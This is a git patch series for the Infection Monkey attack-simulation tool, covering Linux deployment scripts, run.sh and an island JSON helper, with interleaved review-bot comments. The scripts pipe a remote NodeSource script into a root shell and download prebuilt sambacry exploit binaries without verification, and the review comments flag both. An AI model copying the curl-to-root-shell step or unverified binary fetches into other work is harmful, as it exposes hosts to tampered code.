@@ -106,32 +120,38 @@ openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/ser sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error +# Update node +log_message "Installing nodejs" +sudo apt-get install -y nodejs + # Install npm log_message "Installing npm" sudo apt-get install npm - -# Update node -log_message "Updating node" -curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - -sudo apt-get install -y nodejs +npm update log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error -npm update npm run dist # Monkey setup log_message "Installing monkey requirements" -sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1 +sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 cd ${monkey_home}/monkey/infection_monkey || handle_error -python -m pip install --user -r requirements_linux.txt || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + +# Making dir for binaries +mkdir ${MONKEY_BIN_DIR} + +# Download sambacry binaries +log_message "Downloading sambacry binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} + +# Download traceroute binaries +log_message "Downloading tracerout binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} -# Build samba -log_message "Building samba binaries" -sudo apt-get install gcc-multilib -cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner -sudo chmod +x ./build.sh || handle_error -./build.sh sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..9dc66a787 100644 --- a/monkey/infection_monkey/requirements_linux.txt 
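Review bot: `mkdir ${MONKEY_BIN_DIR}` has neither `-p` nor `|| handle_error`, so it errors on every re-run (which the `wget -c -N` flags on the following lines are clearly meant to support) and would silently continue if the directory could not be created at all; write it as `mkdir -p "${MONKEY_BIN_DIR}" || handle_error`. The sambacry `.so` files and traceroute binaries fetched below are prebuilt executables downloaded with no integrity verification; keeping an expected SHA-256 for each beside its URL in `deployment_scripts/config` and checking with `sha256sum -c` before use would let a tampered or truncated download fail the deployment rather than be bundled into the monkey. `tracerout` in the log message is a typo for `traceroute`.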
+++ b/monkey/infection_monkey/requirements_linux.txt @@ -1,11 +1,10 @@ -enum34 impacket pycryptodome cffi requests odict paramiko -psutil==3.4.2 +psutil PyInstaller six ecdsa @@ -14,4 +13,3 @@ ipaddress wmi pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/linux/install_mongo.sh b/monkey/monkey_island/linux/install_mongo.sh index 2395454b6..478d7e0ed 100755 --- a/monkey/monkey_island/linux/install_mongo.sh +++ b/monkey/monkey_island/linux/install_mongo.sh @@ -10,7 +10,7 @@ then elif [[ ${os_version_monkey} == "Ubuntu 18.04"* ]] ; then echo Detected Ubuntu 18.04 - export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.0.8.tgz" + export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.2.0.tgz" elif [[ ${os_version_monkey} == "Debian GNU/Linux 8"* ]] ; then echo Detected Debian 8 @@ -31,6 +31,7 @@ tar -xf mongodb.tgz popd mkdir -p ${MONGODB_DIR}/bin +mkdir -p ${MONGODB_DIR}/db cp ${TEMP_MONGO}/mongodb-*/bin/mongod ${MONGODB_DIR}/bin/mongod cp ${TEMP_MONGO}/mongodb-*/LICENSE-Community.txt ${MONGODB_DIR}/ chmod a+x ${MONGODB_DIR}/bin/mongod diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 978e02fe5..235b30469 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -1,4 +1,16 @@ #!/bin/bash -cd /var/monkey -/var/monkey/monkey_island/bin/python/bin/python monkey_island.py \ No newline at end of file +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db +${python_cmd} monkey_island.py \ No newline at end of file 
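Review bot: In the rewritten run.sh, if none of the three version probes match, `python_cmd` stays empty and the last line degrades to `./monkey_island.py`, which tries to execute the source file directly instead of reporting the real problem; add `[[ -n "${python_cmd}" ]] || { echo "Python 3.7 not found" >&2; exit 1; }` before the mongod line. The detection block is a verbatim copy of the one added to deploy_linux.sh earlier in this series, so a shared helper sourced by both would keep them from drifting. `./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db` is started in the foreground, so the island line only runs once the database process exits — presumably not the intent.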
diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index 49c1e37a5..c6088a3ea 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,4 +1,3 @@ -bson python-dateutil tornado werkzeug From 05af080f98e24dbb1bc23667e6523fede2822a84 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 17 Oct 2019 18:06:01 +0300 Subject: [PATCH 15/44] Linux deployment fixes --- deployment_scripts/deploy_linux.sh | 4 ++++ monkey/infection_monkey/exploit/sshexec.py | 1 - monkey/monkey_island/linux/run.sh | 2 +- 3 files changed, 5 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 136e3f8b1..f3cc4001c 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -70,6 +70,7 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt update sudo apt install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" @@ -82,6 +83,9 @@ log_message "Installing pip" sudo apt install python3-pip ${python_cmd} -m pip install pip +log_message "Install python3.7-dev" +sudo apt-get install python3.7-dev + log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" ${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index f7abd3ce0..9765f018c 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py 
@@ -5,7 +5,6 @@ import time import paramiko import infection_monkey.monkeyfs as monkeyfs -from common.utils.exploit_enum import ExploitType from infection_monkey.exploit import HostExploiter from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline from infection_monkey.exploit.tools.helpers import get_interface_to_target diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 235b30469..26d8c3234 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -13,4 +13,4 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then fi ./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db -${python_cmd} monkey_island.py \ No newline at end of file +${python_cmd} monkey_island.py From e52491aef5ca32cc66c131fa37a589540953b65e Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 10:17:47 +0300 Subject: [PATCH 16/44] Small linux deployment script improvement --- deployment_scripts/deploy_linux.sh | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index f3cc4001c..70ca2e5e3 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -90,6 +90,11 @@ log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" ${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error +log_message "Installing monkey requirements" +sudo apt-get install libffi-dev upx libssl-dev libc++1 +cd ${monkey_home}/monkey/infection_monkey || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + # Download binaries log_message "Downloading binaries" wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL} 
@@ -137,12 +142,6 @@ log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error npm run dist -# Monkey setup -log_message "Installing monkey requirements" -sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 -cd ${monkey_home}/monkey/infection_monkey || handle_error -${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error - # Making dir for binaries mkdir ${MONKEY_BIN_DIR} From fbe9708da654a6190438af7a83bb351cc870129d Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 23 Oct 2019 14:46:59 +0300 Subject: [PATCH 17/44] Removed ppa, unused certificate generation, updated readme --- deployment_scripts/README.md | 2 +- deployment_scripts/deploy_linux.sh | 14 +++----------- monkey/monkey_island/linux/run.sh | 4 ++-- monkey/monkey_island/readme.txt | 10 +++++----- 4 files changed, 11 insertions(+), 19 deletions(-) diff --git a/deployment_scripts/README.md b/deployment_scripts/README.md index 10027edce..0faf95a52 100644 --- a/deployment_scripts/README.md +++ b/deployment_scripts/README.md @@ -16,7 +16,7 @@ Don't forget to add python to PATH or do so while installing it via this script. You must have root permissions, but don't run the script as root.
Launch deploy_linux.sh from scripts directory.
First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). -Choose a directory where you have all the relevant permissions, for e.g. /home/your_username +Choose a directory where you have all the relevant permissions and give it's absolute path, for e.g. /home/your_username Example usages:
./deploy_linux.sh (deploys under ./infection_monkey)
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)
diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 70ca2e5e3..5e191d5fe 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -69,9 +69,8 @@ fi if [[ ${python_cmd} == "" ]]; then log_message "Python 3.7 command not found. Installing python 3.7." - sudo add-apt-repository ppa:deadsnakes/ppa - sudo apt update - sudo apt install python3.7 + sudo apt-get update + sudo apt-get install python3.7 log_message "Python 3.7 is now available with command 'python3.7'." python_cmd="python3.7" fi @@ -119,13 +118,6 @@ sudo apt-get install openssl # Generate SSL certificate log_message "Generating certificate" -cd ${ISLAND_PATH} || handle_error -openssl genrsa -out cc/server.key 1024 || handle_error -openssl req -new -key cc/server.key -out cc/server.csr \ --subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error -openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error - - sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error @@ -151,7 +143,7 @@ wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} # Download traceroute binaries -log_message "Downloading tracerout binaries" +log_message "Downloading traceroute binaries" wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 26d8c3234..dc1a266de 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh 
@@ -12,5 +12,5 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then python_cmd="python3.7" fi -./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db -${python_cmd} monkey_island.py +./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db +${python_cmd} ./monkey_island.py diff --git a/monkey/monkey_island/readme.txt b/monkey/monkey_island/readme.txt index 956892e23..16bcabf0e 100644 --- a/monkey/monkey_island/readme.txt +++ b/monkey/monkey_island/readme.txt @@ -22,7 +22,7 @@ How to set up the Monkey Island server: OR 3.b. Use already running instance of mongodb 3.b.1. Run 'set MONKEY_MONGO_URL="mongodb://:27017/monkeyisland"'. Replace '' with address of mongo server - + 4. Place portable version of OpenSSL 4.1. Download from: https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip 4.2. Extract content from bin folder to monkey_island\bin\openssl @@ -56,7 +56,7 @@ How to run: 2. Install the packages from monkey_island/requirements.txt: sudo python -m pip install -r /var/monkey_island/requirements.txt If pip is not installed, install the python-pip package. Make sure the server is running Python 2.7 and not Python 3+. - + 3. put monkey binaries in /var/monkey_island/cc/binaries monkey-linux-64 - monkey binary for linux 64bit monkey-linux-32 - monkey binary for linux 32bit @@ -81,11 +81,11 @@ How to run: 8. Install npm 8.1. Download and install from: https://www.npmjs.com/get-npm - + 9. Build Monkey Island frontend 9.1. cd to 'monkey_island/cc/ui' 9.2. run 'npm update' 9.3. run 'npm run dist' - + How to run: -1. run run.sh (located under /linux) +1. When your current working directory is monkey, run run.sh (located under /linux) From 4457cdc0c83082ff14a39eeae9664ba58d9fe100 Mon Sep 17 00:00:00 2001 
From: VakarisZ
Date: Wed, 23 Oct 2019 15:11:58 +0300
Subject: [PATCH 18/44] re-added deadsnakes ppa, because ubuntu 16 doesn't support py3.7 reps

---
 deployment_scripts/deploy_linux.sh | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh
index 5e191d5fe..d83d24620 100644
--- a/deployment_scripts/deploy_linux.sh
+++ b/deployment_scripts/deploy_linux.sh
@@ -69,8 +69,8 @@ fi
 if [[ ${python_cmd} == "" ]]; then
 log_message "Python 3.7 command not found. Installing python 3.7."
- sudo apt-get update
- sudo apt-get install python3.7
+ sudo add-apt-repository ppa:deadsnakes/ppa
+ sudo apt install python3.7
 log_message "Python 3.7 is now available with command 'python3.7'."
 python_cmd="python3.7"
 fi
From a305611558d8a079075bd54fbf5f130380373113 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Thu, 24 Oct 2019 10:02:50 +0300
Subject: [PATCH 19/44] re-added deadsnakes ppa, because ubuntu 16 doesn't support py3.7 reps

---
 deployment_scripts/deploy_linux.sh | 8 +++++---
 monkey/monkey_island/linux/run.sh | 2 +-
 2 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh
index d83d24620..1c0f7221c 100644
--- a/deployment_scripts/deploy_linux.sh
+++ b/deployment_scripts/deploy_linux.sh
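Review bot: The re-added `sudo add-apt-repository ppa:deadsnakes/ppa` is followed directly by `sudo apt install python3.7` with no index refresh in between — the `sudo apt update` an earlier patch in this series placed here was dropped together with the PPA and is not restored — so on a fresh Ubuntu 16.04 host the install presumably fails with an unknown package, and since neither line has `|| handle_error` the script continues with `python_cmd="python3.7"` pointing at nothing. Use `sudo add-apt-repository -y ppa:deadsnakes/ppa || handle_error`, `sudo apt-get update`, `sudo apt-get install -y python3.7 || handle_error`. Adding the PPA also trusts a third-party signing key system-wide, which the log message should state so operators know what the script changed on the machine.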
@@ -118,10 +118,13 @@ sudo apt-get install openssl
 # Generate SSL certificate
 log_message "Generating certificate"
-sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
-${ISLAND_PATH}/linux/create_certificate.sh || handle_error
+cd ${ISLAND_PATH}
+openssl genrsa -out cc/server.key 2048
+openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com"
+openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt
 # Update node
+cd "$ISLAND_PATH/cc/ui" || handle_error
 log_message "Installing nodejs"
 sudo apt-get install -y nodejs
@@ -131,7 +134,6 @@ sudo apt-get install npm
 npm update
 log_message "Generating front end"
-cd "$ISLAND_PATH/cc/ui" || handle_error
 npm run dist
 # Making dir for binaries
diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh
index dc1a266de..54e1cdd65 100644
--- a/monkey/monkey_island/linux/run.sh
+++ b/monkey/monkey_island/linux/run.sh
@@ -12,5 +12,5 @@ if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then
 python_cmd="python3.7"
 fi
-./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db
+./monkey_island/bin/mongodb/bin/mongod --dbpath ./monkey_island/bin/mongodb/db &
 ${python_cmd} ./monkey_island.py
From 222b9432e8b412b560cc617127eb1fc8c52f2e77 Mon Sep 17 00:00:00 2001
From: VakarisZ
Date: Thu, 24 Oct 2019 11:17:10 +0300
Subject: [PATCH 20/44] fixed front end dependencies

---
 deployment_scripts/deploy_linux.sh | 8 +++-----
 monkey/monkey_island/readme.txt | 2 +-
 2 files changed, 4 insertions(+), 6 deletions(-)

diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh
index 1c0f7221c..488911f15 100644
--- a/deployment_scripts/deploy_linux.sh
+++ b/deployment_scripts/deploy_linux.sh
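Review bot: The inlined certificate generation loses the `|| handle_error` that the removed `create_certificate.sh` lines carried: `cd ${ISLAND_PATH}` and the three `openssl` commands now continue on failure, so a missing openssl or an unwritable `cc/` leaves the island without a key pair while the script reports success, and a failed `cd` would write `cc/server.key` into whatever the current directory happens to be. Append `|| handle_error` to each of the four lines and tighten the key after `genrsa`, e.g. `chmod 600 cc/server.key || handle_error`, since under the default umask the private key is created world-readable; `cc/server.csr` can be removed once `server.crt` exists. In run.sh, `mongod ... &` now backgrounds the database without recording `$!` or checking that it started, so a mongod that exits immediately goes unnoticed and a mongod that starts outlives the island process; capturing the PID and adding a `trap` that stops it on exit would close both gaps.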
@@ -124,13 +124,11 @@ openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L= openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt # Update node -cd "$ISLAND_PATH/cc/ui" || handle_error log_message "Installing nodejs" +cd "$ISLAND_PATH/cc/ui" || handle_error +curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - sudo apt-get install -y nodejs - -# Install npm -log_message "Installing npm" -sudo apt-get install npm +npm install sass-loader node-sass webpack --save-dev npm update log_message "Generating front end" diff --git a/monkey/monkey_island/readme.txt b/monkey/monkey_island/readme.txt index 16bcabf0e..87b2f8c40 100644 --- a/monkey/monkey_island/readme.txt +++ b/monkey/monkey_island/readme.txt @@ -88,4 +88,4 @@ How to run: 9.3. run 'npm run dist' How to run: -1. When your current working directory is monkey, run run.sh (located under /linux) +1. When your current working directory is monkey, run ./monkey_island/linux/run.sh (located under /linux) From 1c32ef156a5283ecb733031e14991252bd978f49 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 24 Oct 2019 12:54:00 +0300 Subject: [PATCH 21/44] Improved linux deployment instructions --- deployment_scripts/README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/deployment_scripts/README.md b/deployment_scripts/README.md index 0faf95a52..f69a48b77 100644 --- a/deployment_scripts/README.md +++ b/deployment_scripts/README.md @@ -13,10 +13,11 @@ Don't forget to add python to PATH or do so while installing it via this script. ## Linux +Linux deployment script is meant for Ubuntu 16.x machines. You must have root permissions, but don't run the script as root.
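Review bot: `curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -` executes a remote script as root straight off the wire; `-s` without `-f` means an HTTP error body or a truncated transfer is fed to the root shell as a partial script, and nothing records what was run. Fetch to a file and fail loudly instead: `node_setup=$(mktemp) || handle_error`, `curl -fsSL https://deb.nodesource.com/setup_12.x -o "${node_setup}" || handle_error`, `sudo -E bash "${node_setup}" || handle_error`, then remove the file; that also gives an operator a chance to inspect it before a run. `npm install sass-loader node-sass webpack --save-dev` pulls unpinned latest versions and rewrites package.json on every deployment, so these belong in the repository's package.json and lockfile for a reproducible build. deploy_linux.sh appears to rely on `|| handle_error` rather than `set -e`, so each new command here needs its own guard.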
Launch deploy_linux.sh from scripts directory.
-First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default). -Choose a directory where you have all the relevant permissions and give it's absolute path, for e.g. /home/your_username +First argument should be an absolute path of an empty directory (script will create one if doesn't exist, default is ./infection_monkey). +Second parameter is the branch you want to clone (develop by default). Example usages:
./deploy_linux.sh (deploys under ./infection_monkey)
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)
From 348a74361977a67ebb8eca62fb1a90923302ca82 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 10:28:40 +0200 Subject: [PATCH 22/44] Extracted api representations hooks to separate file, added UT, and fixed linter issue use `x not in y` instead of `not x in y`. --- monkey/monkey_island/cc/app.py | 32 +---------- .../cc/resources/representations.py | 31 +++++++++++ .../cc/resources/representations_test.py | 53 +++++++++++++++++++ 3 files changed, 86 insertions(+), 30 deletions(-) create mode 100644 monkey/monkey_island/cc/resources/representations.py create mode 100644 monkey/monkey_island/cc/resources/representations_test.py diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 38af31bde..8ab61c895 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -1,11 +1,8 @@ import os import uuid -from datetime import datetime -import bson import flask_restful -from bson.json_util import dumps -from flask import Flask, send_from_directory, make_response, Response +from flask import Flask, send_from_directory, Response from werkzeug.exceptions import NotFound from monkey_island.cc.auth import init_jwt @@ -24,6 +21,7 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report +from monkey_island.cc.resources.representations import output_json from monkey_island.cc.resources.root import Root from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed 
@@ -62,32 +60,6 @@ def serve_home(): return serve_static_file(HOME_FILE) -def normalize_obj(obj): - if '_id' in obj and not 'id' in obj: - obj['id'] = obj['_id'] - del obj['_id'] - - for key, value in list(obj.items()): - if isinstance(value, bson.objectid.ObjectId): - obj[key] = str(value) - if isinstance(value, datetime): - obj[key] = str(value) - if isinstance(value, dict): - obj[key] = normalize_obj(value) - if isinstance(value, list): - for i in range(0, len(value)): - if isinstance(value[i], dict): - value[i] = normalize_obj(value[i]) - return obj - - -def output_json(obj, code, headers=None): - obj = normalize_obj(obj) - resp = make_response(dumps(obj), code) - resp.headers.extend(headers or {}) - return resp - - def init_app_config(app, mongo_url): app.config['MONGO_URI'] = mongo_url app.config['SECRET_KEY'] = str(uuid.getnode()) diff --git a/monkey/monkey_island/cc/resources/representations.py b/monkey/monkey_island/cc/resources/representations.py new file mode 100644 index 000000000..cd804db50 --- /dev/null +++ b/monkey/monkey_island/cc/resources/representations.py @@ -0,0 +1,31 @@ +from datetime import datetime + +import bson +from bson.json_util import dumps +from flask import make_response + + +def normalize_obj(obj): + if ('_id' in obj) and ('id' not in obj): + obj['id'] = obj['_id'] + del obj['_id'] + + for key, value in list(obj.items()): + if isinstance(value, bson.objectid.ObjectId): + obj[key] = str(value) + if isinstance(value, datetime): + obj[key] = str(value) + if isinstance(value, dict): + obj[key] = normalize_obj(value) + if isinstance(value, list): + for i in range(0, len(value)): + if isinstance(value[i], dict): + value[i] = normalize_obj(value[i]) + return obj + + +def output_json(obj, code, headers=None): + obj = normalize_obj(obj) + resp = make_response(dumps(obj), code) + resp.headers.extend(headers or {}) + return resp 
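Review bot: `normalize_obj` in the new representations.py only normalizes list elements that are dicts (`if isinstance(value[i], dict)`), so a list of `ObjectId` or `datetime` values passes through untouched and `dumps` then renders them in Extended JSON form while the same values at dict level become plain strings — an inconsistent shape for the UI to consume. The function also mutates and returns the caller's object (deleting `_id` in place), which deserves a docstring because callers holding a reference to a fetched document will see it change. A value-level helper makes the recursion uniform; the rewrite below keeps `normalize_obj`'s signature and in-place semantics, and `output_json` is unchanged.
```python
def _normalize_value(value):
    """Convert one value for JSON output: ObjectId/datetime -> str, containers recurse."""
    if isinstance(value, (bson.objectid.ObjectId, datetime)):
        return str(value)
    if isinstance(value, dict):
        return normalize_obj(value)
    if isinstance(value, list):
        return [_normalize_value(item) for item in value]
    return value


def normalize_obj(obj):
    """Normalize a Mongo document in place for the API: '_id' -> 'id', ObjectId/datetime -> str.

    Mutates and returns obj; nested dicts and lists are normalized recursively.
    """
    if ('_id' in obj) and ('id' not in obj):
        obj['id'] = obj['_id']
        del obj['_id']

    for key, value in list(obj.items()):
        obj[key] = _normalize_value(value)
    return obj

# … unchanged: output_json …
```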
diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/resources/representations_test.py new file mode 100644 index 000000000..714c70ed2 --- /dev/null +++ b/monkey/monkey_island/cc/resources/representations_test.py @@ -0,0 +1,53 @@ +from unittest import TestCase +from datetime import datetime +from .representations import normalize_obj + +import bson + + +class TestJsonRepresentations(TestCase): + def test_normalize_obj(self): + # empty + self.assertEqual({}, normalize_obj({})) + + # no special content + self.assertEqual( + {"a": "a"}, + normalize_obj({"a": "a"}) + ) + + # _id field -> id field + self.assertEqual( + {"id": 12345}, + normalize_obj({"_id": 12345}) + ) + + # obj id field -> str + obj_id_str = "123456789012345678901234" + self.assertEqual( + {"id": obj_id_str}, + normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)}) + ) + + # datetime -> str + dt = datetime.now() + expected = {"a": str(dt)} + result = normalize_obj({"a": dt}) + self.assertEqual(expected, result) + + # dicts and lists + self.assertEqual({ + "a": [ + {"ba": obj_id_str, + "bb": obj_id_str} + ], + "b": {"id": obj_id_str} + }, + normalize_obj({ + "a": [ + {"ba": bson.objectid.ObjectId(obj_id_str), + "bb": bson.objectid.ObjectId(obj_id_str)} + ], + "b": {"_id": bson.objectid.ObjectId(obj_id_str)} + }) + ) From d6544c9e03f29338c2a97d7808204a9a0424bb11 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 28 Oct 2019 12:59:32 +0200 Subject: [PATCH 23/44] Whitespace PEP8 fixes --- monkey/infection_monkey/exploit/__init__.py | 12 ++++++------ monkey/monkey_island/cc/services/__init__.py | 2 +- 2 files changed, 7 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/__init__.py b/monkey/infection_monkey/exploit/__init__.py index 9e899b140..e2b75a4dd 100644 --- a/monkey/infection_monkey/exploit/__init__.py +++ b/monkey/infection_monkey/exploit/__init__.py 
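Review bot: The new test module is named `representations_test.py`, while the existing island test visible in this series is `monkey/monkey_island/cc/models/test_monkey.py`; unittest's default discovery pattern is `test*.py`, so unless the project configures a different pattern this file is presumably never collected and its assertions silently do not run. Rename it to `test_representations.py` to match the existing convention. The cases themselves read well; one for a list of `ObjectId` values would pin down the path the implementation treats differently from dict-level values.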
@@ -20,11 +20,11 @@ class HostExploiter(object, metaclass=ABCMeta):
     def __init__(self, host):
         self._config = infection_monkey.config.WormConfiguration
         self.exploit_info = {'display_name': self._EXPLOITED_SERVICE,
-                               'started': '',
-                               'finished': '',
-                               'vulnerable_urls': [],
-                               'vulnerable_ports': [],
-                               'executed_cmds': []}
+                             'started': '',
+                             'finished': '',
+                             'vulnerable_urls': [],
+                             'vulnerable_ports': [],
+                             'executed_cmds': []}
         self.exploit_attempts = []
         self.host = host
 
@@ -43,7 +43,7 @@ class HostExploiter(object, metaclass=ABCMeta):
 
     def report_login_attempt(self, result, user, password='', lm_hash='', ntlm_hash='', ssh_key=''):
         self.exploit_attempts.append({'result': result, 'user': user, 'password': password,
-                                        'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
+                                      'lm_hash': lm_hash, 'ntlm_hash': ntlm_hash, 'ssh_key': ssh_key})
 
     def exploit_host(self):
         self.pre_exploit()
diff --git a/monkey/monkey_island/cc/services/__init__.py b/monkey/monkey_island/cc/services/__init__.py
index 142e51368..ee5b79ad0 100644
--- a/monkey/monkey_island/cc/services/__init__.py
+++ b/monkey/monkey_island/cc/services/__init__.py
@@ -1 +1 @@
-__author__ = 'itay.mizeretz'
\ No newline at end of file
+__author__ = 'itay.mizeretz'
From cd3835a42e1bdf178f9f671fdc8e081eb7c1030f Mon Sep 17 00:00:00 2001
From: Shay Nehmad
Date: Mon, 28 Oct 2019 16:14:52 +0200
Subject: [PATCH 24/44] Whitespace and imports fixes
---
 monkey/common/cloud/aws_instance.py | 4 +-
 monkey/common/cmd/aws/aws_cmd_runner.py | 2 +-
 monkey/common/data/zero_trust_consts.py | 30 +-
 monkey/common/utils/code_utils.py | 2 +
 .../infection_monkey/exploit/elasticgroovy.py | 6 +-
 monkey/infection_monkey/exploit/sambacry.py | 19 +-
 .../exploit/shellshock_resources.py | 808 +++++++++--------
 monkey/infection_monkey/exploit/struts2.py | 7 +-
 .../exploit/tools/http_tools.py | 8 +-
 monkey/infection_monkey/exploit/wmiexec.py | 3 +-
 monkey/infection_monkey/main.py | 9 +-
 monkey/infection_monkey/model/__init__.py | 9 +-
 monkey/infection_monkey/monkeyfs.py | 1 -
 monkey/infection_monkey/network/firewall.py | 7 +-
 monkey/infection_monkey/network/httpfinger.py | 2 +-
 .../infection_monkey/network/ping_scanner.py | 15 +-
